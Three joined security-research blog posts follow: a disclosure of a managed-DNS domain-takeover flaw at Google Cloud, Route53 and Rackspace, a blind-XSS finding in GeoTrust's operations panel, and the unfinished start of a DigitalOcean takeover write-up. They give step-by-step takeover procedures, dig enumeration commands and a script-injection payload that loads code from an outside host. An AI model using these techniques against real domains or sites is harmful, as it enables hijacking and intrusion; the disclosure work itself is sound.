Recently, I found that Digital Ocean suffered from a security vulnerability in their domain import system which allowed for the takeover of 20K domain names. If you haven’t given that post a read I recommend doing so before going through this write up. Originally I had assumed that this issue was specific to Digital Ocean but this couldn’t be farther from the truth as I’ve now learned. It turns out this vulnerability affects just about every popular managed DNS provider on the web. If you run a managed DNS service, it likely affects you too.

The Managed DNS Vulnerability

The root of this vulnerability occurs when a managed DNS provider allows someone to add a domain to their account without any verification of ownership of the domain name itself. This is actually an incredibly common flow and is used in cloud services such as AWS, Google Cloud, Rackspace and of course, Digital Ocean. The issue occurs when a domain name is used with one of these cloud services and the zone is later deleted without also changing the domain’s nameservers. This means that the domain is still fully set up for use in the cloud service but has no account with a zone file to control it. In many cloud providers this means that anyone can create a DNS zone for that domain and take full control over the domain. This allows an attacker to take full control over the domain to set up a website, issue SSL/TLS certificates, host email, etc. Worse yet, after combining the results from the various providers affected by this problem over 120,000 domains were vulnerable (likely many more).

Detecting Vulnerable Domains via DNS

Detecting this vulnerability is a fairly interesting process, it can be enumerated via a simple DNS NS query run against the target’s nameservers. If the domain is vulnerable then the nameservers will return either a SERVFAIL or REFUSED DNS error. The following is an example query using the dig DNS tool:

[email protected]:~/$ dig NS zz[REDACTED].net

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: SERVFAIL, id: 62335
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; Query time: 73 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:46:30 PDT 2016
;; MSG SIZE  rcvd: 42

The above response shows we’ve received a DNS SERVFAIL error indicating that this domain is vulnerable.

If we get a SERVFAIL response how are we supposed to know what the actual nameservers are for this domain are? Actually, dig has already found what nameservers the domain has but just hasn’t displayed them to us. DNS queries for a domain’s nameservers usually follow the following process:

  • Query the DNS root nameservers for the list of nameservers belonging to the domain’s TLD (in this case, .net).
  • Query one of the nameservers for the specified TLD of the domain for the nameservers of the domain.
  • Query the returned nameservers for the domain for the nameservers for the domain (unclear why dig does this, considering you already know what they are from the nameservers from the .net nameservers).

*Note that many of these steps will be skipped if the results are already cached by your resolver.

The last step is what is causing dig to return this SERVFAIL error, we’ll skip it and just ask the nameservers for the .net TLD directly. First we’ll query what those are:

[email protected]:~$ dig NS net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 624
;; flags: qr rd ra; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;net.                           IN      NS

;; ANSWER SECTION:
net.                    2597    IN      NS      b.gtld-servers.net.
net.                    2597    IN      NS      c.gtld-servers.net.
net.                    2597    IN      NS      d.gtld-servers.net.
net.                    2597    IN      NS      e.gtld-servers.net.
net.                    2597    IN      NS      f.gtld-servers.net.
net.                    2597    IN      NS      g.gtld-servers.net.
net.                    2597    IN      NS      h.gtld-servers.net.
net.                    2597    IN      NS      i.gtld-servers.net.
net.                    2597    IN      NS      j.gtld-servers.net.
net.                    2597    IN      NS      k.gtld-servers.net.
net.                    2597    IN      NS      l.gtld-servers.net.
net.                    2597    IN      NS      m.gtld-servers.net.
net.                    2597    IN      NS      a.gtld-servers.net.

;; Query time: 7 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Sat Sep 17 16:53:54 PDT 2016
;; MSG SIZE  rcvd: 253

Now we can query one of these nameservers for the nameservers of our target domain:

[email protected]:~$ dig NS zz[REDACTED].net @a.gtld-servers.net.

; <<>> DiG 9.9.5-3ubuntu0.8-Ubuntu <<>> NS zz[REDACTED].net @a.gtld-servers.net.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3529
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;zz[REDACTED].net.                 IN      NS

;; AUTHORITY SECTION:
zz[REDACTED].net.          172800  IN      NS      dns1.stabletransit.com.
zz[REDACTED].net.          172800  IN      NS      dns2.stabletransit.com.

;; ADDITIONAL SECTION:
dns1.stabletransit.com. 172800  IN      A       69.20.95.4
dns2.stabletransit.com. 172800  IN      A       65.61.188.4

;; Query time: 9 msec
;; SERVER: 192.5.6.30#53(192.5.6.30)
;; WHEN: Sat Sep 17 16:54:48 PDT 2016
;; MSG SIZE  rcvd: 129

Now we can see that the nameservers for this domain are dns1.stabletransit.com and dns2.stabletransit.com and can target this set of nameservers specifically.

In order to find a list of domains vulnerable to this issue I used my copies of the zone files for the .com and .net TLDs which are available via Verisign (you have to apply to get access). These zone files have a list of every .com, and .net domain name along with what nameservers they use. Using this data we can find all domains which are hosted by a specific cloud provider because their nameservers will be those of these cloud providers. Once we have a list for a specific provider we can use a small Python script to query each domain to probe for the SERVFAIL or REFUSED DNS errors. Finally, we then use the cloud management panel to see if we can add these domains to our account, confirming the vulnerability exists.

Google Cloud DNS (~2.5K Domains Affected, Patched)

Google’s Cloud offering includes a managed DNS service line which has an easy import process for new domains. Documentation for doing so can be found here. The general process for doing so is the following:

  • Go to the DNS management panel of your Google Cloud account: https://console.cloud.google.com/networking/dns
  • Click the “+ Create Zone” button.
  • Create a new zone with any name and a “DNS Name” of the vulnerable domain.
  • Click the “Create” button to create this new zone.
  • Note the list of nameservers that have been returned to you, in this example I’ve received the following:google-cloud-returned-nameservers
  • Check if the nameservers match the target nameservers, if they don’t just delete the zone and try again.
  • Once you’ve finally gotten a matching list of nameservers you now have full control of the DNS for that domain.

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported issue to Google bug bounty program, provided a list of vulnerable domains as well.
  • Sep 9, 2016: Report triaged by Google Security Team.
  • Sep 9, 2016: Vulnerability confirmed, internal bug filed for the issue.
  • Sep 13, 2016: Reward of $1,337 awarded, donation matching available if given to a charity.
  • Sep 14, 2016: Requested the reward be given to the Tor Project (making the donation $2,674). Received a Tor hoodie/swag :)from the Tor folks – thanks guys/gals!

Amazon Web Services – Route53 (~54K Domains Affected, Multiple Mitigations Performed)

Amazon’s managed DNS service line is called Route53. They have a number of nameservers which they randomly return to you which are distributed across multiple domains and TLDs. Previously I thought this was to defend against this specific type of vulnerability, however, since they are vulnerable I believe that this was more done to ensure uptime in the case of a TLD experiencing DNS issues.

The domain process for Route53 is complicated by the fact that they have a wide range of nameservers which can be returned to you. However the following process allows you to take over a target domain in just a few minutes. In order to automate this process I wrote a small Python proof-of-concept script which would create and delete Route53 zones until the proper nameservers were returned. One unique property of this vulnerability for Route53 was that you could get just one of the target’s nameservers returned to you instead of all four in a set like other managed DNS providers. This turns out to be just fine from an exploit scenario because you can simply keep the zone with three incorrect nameservers and one correct nameserver and keep creating zones until you have a couple zones with just one target nameserver in each zone. Then you can just replicate your DNS records across these four zones to set DNS for the target.

The process for this is as follows:

  • Use the AWS Route53 API to create a new zone for a target domain.
  • Check the resulting nameservers that were returned for this zone, if any of the nameservers match the target’s nameservers then keep the zone and remove it from the list of targeted nameservers. The following is an example of the nameservers returned for a domain:

route53_returned_nameservers

  • If none are shared with the target nameserver set, delete the zone.
  • Keep repeating this process until you have X number of zones which have all of the target’s vulnerable nameservers.
  • Now just create the DNS record you’d like for the target domain across all zones.

The following is a redacted example of creating four zones for a target domain, each zone containing just one of the target’s nameservers:

four_zones_awsUsing this method we can reliably takeover any of these 54K domains.

Disclosure & Remediation Timeline

  • Sep 5, 2016: Contacted AWS security using PGP describing the full scope of the issue and with an attached list of vulnerable domains.
  • Sep 5, 2016: (less than an hour from first contact): Response from AWS stating they will investigate immediately and follow up as soon as they know more.
  • Sep 5, 2016: Responded to the team with an apology for contact them on labor day and thanking them for the quick response time.
  • Sep 7, 2016: Contacted by Zack from the AWS security team, requesting a call to talk more about the issue and understand a disclosure strategy.
  • Sep 7, 2016: Responded confirming that Sep 8 works for a call to discuss.
  • Sep 8, 2016: Call with AWS to discuss the vulnerability and plans to alert affected customers and remediation of the issue.
  • Oct 7, 2016: Follow up call with someone from the Route53 team discussing Amazon’s remediation strategy and next steps. Their plan was three pronged in approach:

All of the above steps were indeed taken by Amazon. You now get the following warning when you delete a zone in Route53:

route53_warningIf you are an AWS customer using Route53, be sure to read this documentation about the risks of not changing your domain nameservers after deleting a zone from your account.

Disclosure notes: Overall this team was awesome to do disclosure with, they were super helpful and cared deeply about getting a proper fix in place. The response in less than an hour on labor day (late at night too) was crazy to see, very impressed. Great job guys :), wish all disclosure were like this.

Rackspace (~44K Domains Affected, Won’t Fix)

Rackspace offers a Cloud DNS service which is included free with every Rackspace account. Unlike Google Cloud and AWS Route53 there are only two nameservers (dns1.stabletransit.com and dns2.stabletransit.com) for their cloud DNS offering so no complicated zone creation/deletion process is needed. All that needs to be done is to enumerate the vulnerable domains and add them to your account. The steps for this are the following:

  • Under the Cloud DNS panel, click the “Create Domain” button and specify the vulnerable domain and a contact email and TTL.
  • Now simple create whatever DNS records you’d like for the taken over domain.

This can be done for any of the 44K domain names to take them over. Rackspace does not appear to be interested in patching this (see below) so if you are a Rackspace customer please ensure you’re properly removing Rackspace’s nameservers from your domain after you move your domain.

Disclosure & Remediation Timeline

  • Sep 9, 2016: Reported vulnerability to the Rackspace security team, included a list of vulnerable domains.
  • Sep 12, 2016: Rackspace responds with the following:

    “Thank you for your submission. We have taken it under advisement and will contact you if we require any additional information. For the protection of our customers, Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available. Rackspace usually distributes security disclosures and notifications through blog posts and customer support portals.__Please do not post or share any information about a potential security vulnerability in any public setting until we have researched, responded to, and addressed the reported vulnerability and informed customers, if needed. Our products are complex, and reported security vulnerabilities will take time to investigate, address, and fix.__While we sincerely appreciate reports for vulnerabilities of all severity levels, we will include your name on our website at http://www.rackspace.com/information/legal/rsdp if you report a previously unknown vulnerability, which Rackspace has determined to be of a high or critical severity, or in cases where there has been continued research or other contributions made by the person.__Thanks and have a great day.”

  • Sep 14, 2016: Due to the previous email seeming to state that they won’t confirm the issue until a full investigation occurs – I ask that they notify me when remediation has occurred so I can properly coordinate releasing the vulnerability information to the general public.
  • Oct 7, 2016: Due to a lack of response from vendor, notified them that a 90-day responsible disclosure timeline would be observed with a disclosure occurring regardless of a patch.
  • Nov 7, 2016: Pinged Rackspace (no response as of yet) notifying them that disclosure will occur in 30 days.
  • Dec 5, 2016: Received the following response from Rackspace:

    “Thank you again for your work to raise public awareness of this DNS issue. We’ve been aware of the issue for quite a while. It can affect customers who don’t take standard security precautions when they migrate their domains, whether those customers are hosted at Rackspace or at other cloud providers.

     

    If a customer intends to migrate a domain to Rackspace or any other cloud provider, he or she needs to accomplish that migration before pointing a domain registrar at that provider’s name servers. Otherwise, any customer of that provider who has malicious intentions could conceivably add that domain to his or her account. That could allow the bad actor to effectively impersonate the domain owner, with power to set up a website and receive email for the hijacked domain.

     

    We share multiple articles about DNS both on the Rackspace Support Network (https://support.rackspace.com/) and in the Rackspace Community (https://community.rackspace.com/). Our Acceptable Use Policy (http://www.rackspace.com/information/legal/aup) prohibits activities like this. Our support teams also work directly with customers to help them take the simple steps necessary to secure their domains.

     

    We appreciate your raising public awareness of this issue and are always glad to work with you.

     

    Sincerely,

    The Rackspace DNS Team”

Disclosure notes: Responsible disclosures that affect a large number of vendors usually take a full 90-days because one vendor drags their feet until the very end. In this case it appears Rackspace is that vendor. Their policy, specifically the following: “Rackspace does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches, fixes, or releases are available.” does not instill confidence that anything is being done to address reported security vulnerabilities. To not confirm or discuss a reported security vulnerability until after remediation is a very odd approach and it’s unclear why such a policy would ever be in place. One would hope that all of the initial reports they receive are 100% clear in explanation, since they cannot ask any questions until after remediation of said unclear vulnerability has occurred. Additionally, the final response seems to be to the effect of “we write many articles about DNS, also if a customer doesn’t properly remediate this issue, they will be vulnerable but it is against our AUP to exploit this issue”. So this puts extra importance on raising awareness for this issue, since Rackspace does not appear interested in issuing a fix for this issue.

DigitalOcean (~20K Domains Affected)

For the full write up on how this issue affected Digital Ocean, please see this post.

Remediation Recommendation

Different cloud providers took different approaches to this issue. My recommendation for remediation of this issue is fairly straightforward and is the following:

  • User adds the domain to their account via the cloud management panel.
  • At this time the cloud provider returns a random list of nameservers for the domain owners to point their domain to. For example the following is an example list:
    • a-nameserver-one.example.com
    • a-nameserver-two.example.com
    • a-nameserver-three.example.com
  • The cloud provider now continually queries the TLD’s nameservers for the list of nameservers that the domain has been set to. Once the user has set their nameservers properly the cloud provider stores the list of nameservers and the domain in a database.
  • For any future zones created for this domain the cloud provider will only return nameservers which do not match the stored list of nameservers. This means that in order to use a newly created zone the domain owner will have to set their domain’s nameservers to a new nameserver set, ensuring that only the domain owner can actually carry out this action.
  • The cloud provider will continually query the TLD nameservers to see if the domain’s nameservers have changed to the new set and will store the results in a database as we did in step 3.

The above method does add a bit of friction to the process of re-creating a zone for a domain, but completely prevents this issue from occurring. Since the friction is only equivalent to the initial domain import process it doesn’t seem to be too unreasonable but it is possible that provider won’t want to inconvenience customers this way.

Usefulness to Attackers

The attack scenario for this vulnerability can be split into two separate groups, targeted and un-targeted. Depending on the end goal of an attacker, either one could be chosen.

Targeted Attack

In the targeted use case you have an attacker who wants to take over a specific domain or list of domains belonging to their victim. In this case an attacker would set up a script to continually perform NS queries against the nameservers of the domains that they are targeting. The script will detect if it has received an SERVFAIL or REFUSED DNS error and will immediately attempt to allocate the target’s nameservers upon detecting no zone exists for the domain. Many different mistakes on the domain owners part could cause the zone to be deleted such as the cloud provider deleting the zone due to lack of payment, or if the company is changing providers, etc.

Un-Targeted Attack

The more likely attack scenario, in my opinion, would be an attacker who is merely interested in clean domains to be used for malware and spam related campaigns. Since many threat intelligence services will rate a domain based off of its age, length of registration, and cost to register there is a big advantage to hijacking existing domains over registering new ones. In addition to the hijacked domains often having past history and a long age, they also have WHOIS information which points to real people unrelated to the person carrying out the attack. Now if an attacker launches a malware campaign using these domains, it will be harder to pinpoint who/what is carrying out the attack since the domains would all appear to be just regular domains with no observable pattern other than the fact that they all use cloud DNS. It’s an attacker’s dream, troublesome attribution and an endless number of names to use for malicious campaigns.

Conclusion

This vulnerability is a systemic issue which affects all major managed DNS providers. It is very likely that more providers are affected which are not mentioned here. All managed DNS providers are encouraged to check their own implementations for this issue and patch/notify customers as soon as possible.

Until next time,

-mandatory

bur_resized

This is a continuation of a series of blog posts which will cover blind cross-site scripting (XSS) and its impact on the internal systems which suffer from it. Previously, we’ve shown that data entered into one part of a website, such as the account information panel, can lead to XSS on internal account-management panels. This was the case with GoDaddy, the Internet’s largest registrar. Today we will be showing off a vulnerability in one of the Internet’s certificate authorities which allows us to get a rare peak inside of their internals.

One of the Best Disclosure Experiences in a Long Time

Before we start I would like to call out the awesome responsible disclosure experience I had with Symantec (the owner of GeoTrust). To be honest I had incredibly low expectations before I contacted them but the person I talked with (Mike) was a super helpful and made the experience completely painless. They had no problem using PGP, kept me updated with the status of the bug, and gave me a tracking ID for the vulnerability – all signs of a mature disclosure program. Finally they even took action to ensure that the entire code base was scrubbed for other XSS vulnerabilities which actually took me aback with the level of pro-activeness. While the security community seems to now hate vendors if they don’t reward $50,000 for every security issue, I still really appreciate companies working with researchers even if no reward is involved. The security advisory for this vulnerability has also been posted to their website and can be found here.

What is a Certificate Authority?

For those unfamiliar with the inner-workings of SSL/TLS, the entire system works based off of trusting a few certificate authorities (CAs). These certificate authorities have the power to mint intermediate certificate authorities which can then mint certificates for websites looking to protect their communications with SSL/TLS. All of these certificate authorities are embedded in your web browser by default which gives them this power. This system means that the certificate authorities can sell this service, as is the case with GeoTrust, or offer it for free as is the case with Let’s Encrypt. In order for an attacker to intercept communications to these websites, they must have access to a trusted CA or an intermediary CA created by a trusted CA which is already embedded in the user’s browser. Mozilla, the creator of the Firefox web browser, keeps a simple list of certificate authorities that are trusted in Firefox by default here. One of the important responsibilities of certificate authorities is to ensure that only the true owners of websites are allowed to issue certificates. This is to ensure that malicious actors don’t get a valid certificate for a website that they do not own (such as google.com, etc). If a certificate authority fails to carry out this duty properly it risks being removed from all modern web browsers. This was the case with the certificate authority DigiNotar which was breached and used to issue improper SSL/TLS certificates for Gmail, allowing the Iranian government to spy on its citizens. Browser vendors reacted by removing DigiNotar from their trust stores, meaning that all certificates issued by this certificate authority no longer trusted and would throw an SSL error when used. In the end, this led to the Dutch goverment taking over the company and ultimately, bankruptcy for DigitNotar.

Discovering the Vulnerable GeoTrust Operations Dashboard

Originally, I wasn’t looking for a vulnerability in GeoTrust at all, I simply wanted to obtain a trusted SSL/TLS certificate with my XSS Hunter payloads in some of the certificate fields using various certificate authorities. This was an attempt to enumerate vulnerabilities in systems which scan the Internet for these certificates and index them. However, during my testing I found an unintended vulnerability in GeoTrust’s Operations Panel when a support agent viewed my certificate request information. I woke up one morning with an XSS Hunter payload fire email titled [XSSHunter] XSS Payload Fired On https://ops.geotrust.com/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp in my inbox with the following screenshot attached:

redacted_geotrust_op_screenshotThe above screenshot is partially redacted to respect the privacy of the customers of GeoTrust (and the agent viewing the page). However, the red highlighted portion shows the location of the XSS payload which had fired.

In the above screenshot there appears to be a “Vetting” portion to this operations panel. Likely this is for manual “vetting” of those requesting certificates. I’ll leave the possible security implications of this up to the reader. However, I was not able to verify its purpose since I didn’t want to overstep my boundaries in any way.

So what code made this page vulnerable? Let’s take a closer look.

Better Context, Better Understanding

Since our XSS Hunter probe collects the vulnerable page’s DOM we can investigate the page’s JavaScript source code to attempt to discover the cause of this vulnerability. In this case the root of the vulnerability appeared to be caused by a vulnerable function named getOrders. The code for this function is the following:

function getOrders() {

    // get the form values
    var dateInput = $('#date2').datepicker( "getDate" );
    var range1 = $('#from').datepicker( "getDate" );
    var range2 = $('#to').datepicker( "getDate" );

    dateInput = $.datepicker.formatDate('@', dateInput);
    range1 = $.datepicker.formatDate('@', range1);
    range2 = $.datepicker.formatDate('@', range2);

    var curr = new Date();

    if((curr - range2) < 86400000){
           alert("Cannot cancel orders less than 21 days old")
    }else{

        if($('input[name=searchRadio]:checked').val() == "byDate"){
                range1 = 0;
                range2 = dateInput;
        }

        range1 = range1.toString();
        range2 = range2.toString();

        $.ajax({
            type: "GET",
            dataType: "json",
            url: "/opsdashboard/CancelAgedOrdersServlet",
            data: "range1=" + range1 + "&range2=" + range2 + "&cancel=false",
            success: function(data, textStatus, XMLHttpRequest){
                var table = "<table border=\"1\" cellpadding=\"3\" cellspacing=\"0\" align=\"center\"><tr><td bgcolor=\"pink\">" +
                                "Order ID</td><td bgcolor=\"pink\">Product Name</td><td bgcolor=\"pink\">Customer Name" +
                                "</td><td bgcolor=\"pink\">Order Date</td><td bgcolor=\"pink\">Order State</td></tr>";
                var count = data.length;
                var i;
                if(count==0){
                    alert('No orders to retrieve');
                     $('#getOrdersDiv').show();
                }
                else if(count==1 && data[0].RecordsOverflow == "true"){
                    alert('Too many records retrieved, please reduce date range.');
                     $('#getOrdersDiv').show();
               }
                else{
                for(i = 0; i < count; i++){
                    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
                    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
                    "</td><td>" + data[i].State + "</td></tr>";
                }

                table = table + "</table>";
                $('#grid').html(table);
                $('#grid').show();
                $('#cancels').show();
            }

            },
            error: function(XMLHttpRequest, textStatus, errorThrown){
                alert('No orders to retrieve');
                $('#getOrdersDiv').show();
            }
        });
    }
}

The above code shows that the HTML table seen in the screenshot is created by concatenating HTML with order information retrieved from a JSON endpoint /opsdashboard/CancelAgedOrdersServlet. The relevant lines are the following:

for(i = 0; i < count; i++){
    table = table + "<tr><td>" + data[i].ID + "</td><td>" + data[i].Product +
    "</td><td>" + data[i].Customer + "</td><td>" + (data[i]).Date +
    "</td><td>" + data[i].State + "</td></tr>";
}

The product ID, name, customer name, and state are all used to concatenate each row in the HTML table. When going through the free-trial certificate sign up process the customer name I provided was the following:

"><script src=https://y.vg></script>

Once the JavaScript code runs on my input, it creates a row with the following HTML:

<tr><td>13785664</td><td>GeoTrust SSL Trial</td><td>"><script src="https://y.vg"></script</td><td>06/06/2016 05:40:04</td><td>Waiting for Whois Approval</td></tr>

Finally, the entire HTML blob is inserted into the DOM with the following line:

$('#grid').html(table);

This causes the _

String concatenation is one of the most common ways for XSS vulnerabilities to occur and this is no exception. The important thing to note in this example is that we are able to determine the root cause of the vulnerability with ease due to the amount of contextual information collected by our XSS Hunter payloads. This makes communicating the root issue much easier and has in the past even led to vendors becoming concerned that I have actually logged in as an internal agent (though not in this specific case). In the world of blind payload testing, context is everything. You may only trigger the vulnerability a single time so you must have as much information as possible if you want to get it fixed.

Exploitation During Remediation

Shortly after discovering this vulnerability I reached out to the Symantec security team to disclose this vulnerability. After a quick exchange of PGP keys the team received the vulnerability and confirmed they understood the issue and told me they would work on getting in contact with the appropriate product team.

A few days after this had occurred I woke up to yet another payload fire email, this time the title was the following:

[XSSHunter] XSS Payload Fired On https://stage1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Attached was the following screenshot:

symantec_staging_xss_payload_fireThe above screenshot requires less redaction, because it is filled with test data due to it being a staging instance. Apparently the product team that received the vulnerability report decided to use the same payload in staging as in production. In the upcoming days I received a few more payload fires from the same IP addresses:

[XSSHunter] XSS Payload Fired On file:///C:/Users/sachin_[REDACTED_LAST_NAME]/Desktop/iFrame.html

[XSSHunter] XSS Payload Fired On https://ft1-ops.geotrust.symclab.net/opsdashboard/com.geotrust.presentation.app.ops.services.cancelagedorders.CancelAgedOrders/CancelAgedOrders.jsp

Humorously the first email contained the following screenshot attached to it:

symantec_desktop_fire

The DOM contents were the following:

<html><head></head><body><header>Hello</header>
 
<iframe src="https://stage2-products.geotrust.symclab.net/orders/rapidssl.do?ref=454848RAP60985"></iframe>
 
`">` (S `"><table title="Click to Verify - This site chose Symantec SSL for secure e-commerce and confidential communications." border="0" cellpadding="2" cellspacing="0" width="135">
<tbody><tr>
<script>alert(1)</script><script src="https://y.vg"></script>
</tr></tbody></table>
</body></html>

It appeared one of the product team members was attempting to analyse the payload. The “Hello” made me wish I could’ve sent a response. So if you’re Sachin and you’re reading this post…hi! After receiving a few of these payload fires I reached back out to Symantec to let them know that the product team was testing with my payload. They communicated this to the team and I stopped receiving them shortly after.

The above occurrence points out another interesting angle of using blind cross-site scripting payloads. Since you are alerted of all payload fires, an attacker can not only learn about the XSS vulnerabilities themselves but also if someone is investigating the payload. This gives the attacker an advanced warning of someone looking into their activities.

In addition to early warning, it shows that developer’s first instincts can also be quite dangerous. The User-Agent of the developer who opened a local HTML file indicated that he was using Firefox 46 on Windows 7. The browser being used is important because file:// URIs are treated very differently depending on which browser is being utilized. Firefox, for example, allows you to use XMLHTTPRequest to retrieve files which are in the same directory or lower on the file system. This means that had I been malicious I could have written a payload to enumerate and send me files off of the developer’s hard drive (assuming they were in the same or lower directory of the fired .html payload file). Since this file was opened from the developer’s Desktop that means the payload could’ve stolen everything else located there as well (what do you have on your desktop?). What started out as an XSS vulnerability in a website has now become a vulnerability which can ex-filtrate files from a developer’s computer.

Final Thoughts

From this case study we’ve learned a lot about the precarious nature of blind XSS testing. If you are interested in testing for these types of vulnerabilities yourself, you can sign up for an account on the XSS Hunter website. If you don’t trust me or want to run your own version you can get a copy of the source code on Github.

Disclosure Timeline

  • July 7th: XSS payload fire email received indicating the GeoTrust Operations Panel was vulnerable.
  • July 7th: Email sent to [email protected] – bounce message received.
  • July 7th: Sent vulnerability report to [email protected] instead after discovering Symantec owns GeoTrust.
  • July 8th: Received response from Mike at Symantec with a PGP key for encrypting the vulnerability details.
  • July 8th: Responded with PGP-encrypted vulnerability report.
  • July 8th: Vulnerability is confirmed by Mike and he states that he will reach out to the relevant team to get it fixed.
  • July 14: Reached back out to Symantec to alert them that the product team is using the https://y.vg payload in staging testing.
  • July 15: Mike from Symantec states he’ll follow up with the team about it, provides the tracking ID of SSG16-042 for the vulnerability.
  • August 31: Symantec posts advisory on their website, it’s likely that a fix happened long before this point but extra time was taken to check the rest of the panel for further vulnerabilities.

crashed_ship

The above image is taken from here and was taken by Steve Jurvetson.

EDIT: DigitalOcean seems to be getting a lot of flak from this post so I’d just like to point out that I feel DigitalOcean’s reaction in this case was entirely justified (they saw an anomaly and they put a stop to it). The only thing I’d wish was done differently would be that the domains were deleted from my account upon me being banned. There was a few hour delay between testing and reaching out to them and ideally I should’ve reached out ahead of time. The main reason I did not reach out with the theory instead of the proof-of-concept was because I believed that it would be ignored due to lack of evidence (as is my experience with past disclosures). Overall my impression of DigitalOcean’s security team is very positive and I will definitely be much more proactive about reaching out to them in the future.

DigitalOcean is a cloud service provider similar to Amazon Web Services or Google Cloud. They offer cloud DNS hosting as one of their product lines – a nice guide on how to set up your domain to use their DNS can be found here. Take a moment to read it over and see if you can spot any potential issues with their domain name set up process.

From a quick glance it appears to be a very easy to use system. For example: No pesky domain validation to impede your ability to add any arbitrary domain to your account, no need to recall who is on your domain’s WHOIS, and no need to set your domain to specific nameservers as is needed with systems such as Cloudflare. In fact all you have to do is the following:

“Within the Networking section, click on Add Domain, and fill in the the domain name field and IP address of the server you want to connect it to on the subsequent page.”

So, if you’d like, you can add my domain thehackerblog.com to your own DigitalOcean account right now (assuming nobody else has done so already). This brings up interesting questions like, “can people block me from importing my domain to DigitalOcean?” and, “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?“. These are good questions, but before we answer them we’ll take a short detour to another cloud provider and see how their implementation differs.

The Route53 Set Up Process

Amazon Web Services, or AWS, also offers cloud DNS hosting in the form of its product line known as Route53. As a test, we’ll try the set up process for the domain thehackerblog.com. You can see AWS’s official documentation here if you’d like to try this yourself. The first step is to click the Create Hosted Zone button in the top left corner of the Route53 control panel. We’ll now fill in the domain we wish to use along with a short comment and whether or not we wish for this DNS zone to be public. Finally we hit create and are brought to the DNS management panel for our newly created zone. The NS record type has been pre-populated with a few randomly generated nameservers. For example, the nameserver list I received after trying this is as follows:

ns-624.awsdns-14.net.

ns-39.awsdns-04.com.

ns-1651.awsdns-14.co.uk.

ns-1067.awsdns-05.org.

The above is very important – if I created a zone for thehackerblog.com and you did the same we’d both get different nameservers. This ensures that nobody could takeover my domain if I deleted the zone file from my AWS account because the nameservers are specific to my account. So, if I deleted my domain and you wanted to take it over, you’d have to keep trying until you get the same nameserver set as above in order to do so. Otherwise my domain would be pointed to other nameservers than the ones you control.

Back to DigitalOcean

Returning to DigitalOcean, the answer to the question “what happens when I delete my domain from DigitalOcean but forget to change the nameservers?” becomes clear. If you delete the domain from your account anyone can immediately re-add it to their own account without any verification of ownership and take it over.

It’s one thing to notice a possible issue that could occur but proving that it does occur at a large scale is another beast. How can we find out if this issue is systematic and common without attempting to add every domain on the Internet to our DigitalOcean account? How would we even get a list of every domain name anyway?

To start, one notable way to tell if a domain has been added to a DigitalOcean account is to perform a regular DNS query and see how the DigitalOcean nameserver’s respond. As an example, we’ll use alert.cm, which has their nameservers set to DigitalOcean but are not listed under any DigitalOcean account:

[email protected] ~> dig NS alert.cm @ns1.digitalocean.com.

; <<>> DiG 9.8.3-P1 <<>> NS alert.cm @ns1.digitalocean.com.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 53736
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;; QUESTION SECTION:
;alert.cm.            IN    NS

;; Query time: 51 msec
;; SERVER: 173.245.58.51#53(173.245.58.51)
;; WHEN: Tue Aug 23 23:09:00 2016
;; MSG SIZE  rcvd: 26

As can be seen in the above dig output, the DigitalOcean nameservers returned a DNS REFUSED (RCode 5) error which indicates that the nameservers refused to respond to the NS record query we performed. This gives us an easy and lightweight way to differentiate between domains that are currently listed under a DigitalOcean account and domains that aren’t.

This solves one part of the problem, but checking every domain on the Internet this way is still very intensive. Additionally, how can we get a list of every domain name on the Internet? The answer is to get a copy of the zone files for various top level domains (TLDs). To start we’ll acquire the zone files for the .com and .net TLDs because they are easily acquirable from Verisign for research purposes. The zone files contain every .com and .net domain in existence and their corresponding nameservers. By grepping through these zone files we can figure out exactly how many .com & .net domain names use DigitalOcean for DNS hosting. At the time of this writing, the count for both TLDs are the following:

  • .com: 170,829
  • .net: 17,101

Combined, this is a total of 187,930 domain names that have DigitalOcean as their DNS provider. We can now query all of these domains to check for DNS REFUSED errors to see if they are not listed under a DigitalOcean account (and are thus able to be taken over). After a short Python script and a few hours of DNS querying we are able to enumerate all of the vulnerable domains (at least in the two TLDs previously mentioned). The final count comes out to be 21,598 domains that returned a DNS REFUSED error upon querying them. After adding these domains to my DigitalOcean account via their API, the real number turned out to be closer to ~19,500 domains (as it appears the DNS method was not 100% accurate). For all of the domains added to my account a single DNS A record for the base domain was added to a EC2 instance. This was done in hopes of understanding why so many domains ended up in this state, and the results were quite surprising.

The Sinkholed Traffic

